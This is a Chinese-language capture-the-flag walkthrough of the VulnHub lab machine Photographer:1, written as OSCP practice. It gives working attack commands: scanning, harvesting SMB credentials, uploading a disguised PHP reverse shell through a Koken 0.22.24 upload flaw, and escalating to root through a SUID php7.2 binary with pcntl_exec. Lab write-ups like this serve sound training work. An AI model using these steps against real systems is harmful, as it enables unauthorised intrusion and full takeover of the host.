vulnhub-PHOTOGRAPHER: 1

  渗透测试

靶机下载地址:http://www.vulnhub.com/entry/photographer-1,519/

靶机ip:192.168.169.142

攻击者ip:192.168.169.136

难度:中低。This machine was developed to prepare for OSCP

CTF过程:

(1) 端口扫描:nmap -sV 192.168.169.142

发现开放了80/139/445/8000端口

(2)敏感目录扫描:80跟8000端口是两个站点,扫描是否存在可被利用的敏感路径

扫描工具:gobuster/nikto/dirb等均可

gobuster dir -u http://192.168.169.142 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c 50

      

扫描8000端口,存在admin目录:http://192.168.169.142:8000/admin

(3)探测445端口

使用工具:enum4linux

发现smb服务正常运行,访问smb服务:smb://192.168.169.142/sambashare,发现两个文件,其中mailsent.txt里有疑似账号和密码信息。

(4)用上面的账号密码登录http://192.168.169.142:8000/admin,成功登录后台。

分析该站点是Koken 0.22.24,该版本存在一个上传解析漏洞,可利用该漏洞上传webshell获取权限。

(5)生成webshell:cp /usr/share/webshells/php/php-reverse-shell.php /opt/secscorpio.php.jpg
修改webshell的反弹ip和端口:

通过burpsuite截断上传后,访问该url,同时在攻击机设置监听,成功获取shell

 

(6)获取交互式shell:python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

扩展:在渗透测试过程中,低权限shell常常有很多限制,比如可能会不小心被按键给中断;可以通过以上命令获取交互式shell,操作更加友好方便。

查看suid权限的文件:find / -perm -u=s -type f 2>/dev/null

扩展:SUID 权限仅对二进制可执行文件有效

通过php7.2提取至root: /usr/bin/php7.2 -r “pcntl_exec(‘/bin/sh’, [‘-p’]);”

扩展:pcntl_exec函数的作用是在当前进程空间执行指定程序,版本要求:PHP > 4.2.0

成功获取到flag